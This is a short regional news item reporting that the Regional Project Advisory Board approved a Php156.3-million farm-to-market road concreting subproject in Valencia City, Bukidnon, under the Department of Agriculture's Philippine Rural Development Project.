Region 10 – The Regional Project Advisory Board (RPAB) approved this month  the infrastructure development subproject of concreting Mt. Nebo-Sitio Migtulod Farm to Market Road (FMR) proposed by the Local Government Unit of Valencia City, Bukidnon.

With an estimated cost of Php156.3-million, the proposed FMR is expected to serve the farmers in the area with major crops such as corn, sugarcane, banana, rubber, coffee, cacao, and more.

The RPAB found the project beneficial to the community as it will bring improvement in the economic development in the area with its identified commodities that will be served by the road.

RAFC Chair and RPAB member Edgardo Layug emphasized this development through value-chain approach to expand market potentials of products including the coffee and cacao.

“It is important that you will be able to identify products that you will go into processing,” Layug said as he urged the Municipal Agriculture Office of LGU Valencia City to intensify extension support to the farmers.

This FMR is for funding from the additional financing for 2019 of the Philippine Rural Development Project of the Department of Agriculture (DA-PRDP) under the Intensified Building Up of Infrastructure and Logistics for Development (I-BUILD) component.
